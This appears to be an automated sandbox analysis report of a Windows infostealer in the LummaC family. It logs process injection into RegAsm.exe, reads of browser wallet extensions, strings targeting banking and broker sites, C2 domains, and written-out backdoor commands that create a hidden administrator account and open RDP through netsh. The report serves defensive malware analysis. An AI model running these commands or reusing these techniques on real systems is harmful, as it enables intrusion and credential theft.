Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: KKJDGD.3.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: net1.exe, 0000002E.00000002.3017152059.0000000003408000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V AdministratorsU{
Source: KKJDGD.3.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|
Source: KKJDGD.3.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003022000.00000004.00000800.00020000.00000000.sdmp, BKJKEBGDHD.exe, 0000000F.00000002.3052610087.000000000301D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: KKJDGD.3.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2876092064.0000000001216000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KKJDGD.3.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: KKJDGD.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegAsm.exe, 0000000E.00000002.3294389274.000000000165A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX{l
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000150A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: KKJDGD.3.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: BKJKEBGDHD.exe, 0000000F.00000002.3049861165.00000000010A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: KKJDGD.3.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: net1.exe, 0000002E.00000002.3017152059.0000000003408000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators
Source: KKJDGD.3.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: KKJDGD.3.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: KKJDGD.3.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: KKJDGD.3.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: KKJDGD.3.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: KKJDGD.3.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegAsm.exe, 0000000E.00000002.3294389274.000000000165A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: KKJDGD.3.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: KKJDGD.3.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KKJDGD.3.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: KKJDGD.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: KKJDGD.3.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: KKJDGD.3.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-87058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-87042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-88373

Source: C:\Windows\System32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004476D0 LdrInitializeThunk,

11_2_004476D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]	3_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]	3_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\ProgramData\BKJKEBGDHD.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042762E SetUnhandledExceptionFilter,	3_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C54B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C54B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C6FAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7032, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02AB2139 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02AB2139

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: BGDGHJEHJJ.exe, 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wallkedsleeoi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 111B008	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E9A008	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 115F008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BGDGHJEHJJ.exe "C:\ProgramData\BGDGHJEHJJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIJEGDAKEH.exe "C:\ProgramData\GIJEGDAKEH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKJKEBGDHD.exe "C:\ProgramData\BKJKEBGDHD.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECBGHCGCBKFI" & exit	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_7fdfafe0 /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
